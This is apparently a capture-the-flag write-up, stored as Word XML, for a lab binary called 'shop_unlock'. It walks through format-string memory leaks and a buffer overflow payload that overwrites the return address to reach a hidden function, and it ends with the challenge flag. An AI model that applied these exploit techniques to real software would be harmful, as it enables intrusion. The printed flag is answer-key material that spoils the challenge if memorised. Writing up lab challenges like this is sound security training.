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Shop Unlock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1: Binary Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Check the binary type using:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>```shell</w:t>
        <w:br/>
        <w:t>file shop_unlock</w:t>
        <w:br/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2: Finding Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Running the binary and entering input reveals potential format string issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>```shell</w:t>
        <w:br/>
        <w:t>./shop_unlock</w:t>
        <w:br/>
        <w:t>Welcome to the Shop!</w:t>
        <w:br/>
        <w:t>Enter your customer details: %p %p %p %p</w:t>
        <w:br/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3: Exploiting Format String</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Using format string vulnerabilities, we can leak memory addresses and find return pointers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>```shell</w:t>
        <w:br/>
        <w:t>python -c 'print("%x "*40)' | ./shop_unlock</w:t>
        <w:br/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4: Buffer Overflow &amp; Ret2libc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>With an overflow attack, we overwrite the return address to call `hidden_function()`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>```shell</w:t>
        <w:br/>
        <w:t>python -c 'print("A"*72 + "\xef\xbe\xad\xde")' | ./shop_unlock</w:t>
        <w:br/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5: Retrieving the Flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Once the function is triggered, the flag `G8KEY{5H0P_F4NCTI0N_4NL0C3ED}` is printed.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